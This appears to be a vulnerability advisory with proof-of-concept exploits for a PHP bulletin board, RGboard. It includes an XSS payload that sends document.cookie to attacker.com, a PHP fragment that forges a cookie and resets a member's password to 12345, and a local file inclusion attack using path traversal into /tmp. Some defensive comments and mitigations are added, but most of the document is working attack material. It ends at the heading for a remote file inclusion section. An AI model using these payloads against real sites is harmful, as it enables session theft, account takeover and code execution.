/***************************
XSS Vulnerability
/wrtie.php
..
$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'.
*************************/
poc:
Inject the XSS tag:
"http://attacker.com" Hi">onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi there! :)
/rghunter.php - Sets the password to 12345
// Advisory PoC fragment (rghunter.php). $l, $url and $c are defined outside this
// excerpt, so the fragment is not self-contained.
// What it shows a defender: the password-change page is reached with nothing more than
// a cookie set from the client side, which suggests modify.php relies solely on the
// cookie-carried session and does not re-verify the current password (inferred from the
// advisory's "sets the password to 12345" claim — confirm against modify.php).
// Mitigations on the application side: require the current password (or a fresh
// re-authentication) and a CSRF token on modify.php; mark the session cookie HttpOnly
// and Secure, since the XSS payload above exfiltrates document.cookie.
eregi_replace("http://","",$l);
$chk = 0;
// Locate the last '/' in $url.
for($i = 0; $i < strlen($url); $i++)
{
if($url[$i] == '/')
{
$chk = $i;
}
}
// Intended to truncate $url at that position (assigns "" to each remaining offset).
for($i = $chk; $i < strlen($url); $i++)
{
$url[$i] = "";
}
// Target the member modify page relative to the board directory.
$url = $url."/../rg4_member/modify.php";
// Cookie set from attacker-controlled data ($c not shown here).
setcookie($c);
?>
/***************************
Local File Inclusion Vulnerability
/_footer.php
if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion
*************************/
poc:
//Yeah, there is a problem: file_exists()!
//How can we bypass it? I don't know :)
//If we have an account on the same server as the target, we can attack its board easily
//Here is the example :
http://attacker.com/RGboard/rg4_board/_footer.php?skin_path=../../../../../../tmp/
/tmp/footer.php
// Advisory PoC: the file dropped at /tmp/footer.php on a shared host. Because
// _footer.php does include($skin_path."footer.php") after a file_exists() check,
// pointing skin_path at /tmp/ makes the board execute this file. This sample only
// lists the /tmp directory, but any PHP placed here would run inside the web
// server process.
// Mitigation: never build an include path from request data. Resolve the skin to a
// fixed directory plus a validated name (e.g. basename() against an allow-list) and
// only then test the resolved path; do not rely on file_exists() as the gate.
$d = dir("/tmp");
echo "Handle: " . $d->handle . "\n";
echo "Path: " . $d->path . "\n";
while (false !== ($entry = $d->read())) {
echo $entry."\n";
}
$d->close();
?>
//Yeah, that is good, but when we don't have an account on that server, how can we beat the target?
//We can find a clue from php.net
//On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares.
//As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers
//for a listing of which wrappers support stat() family of functionality.
//Did you find the clue too? :-O
/***************************
Remote File Inclusion Vulnerability
/footer.php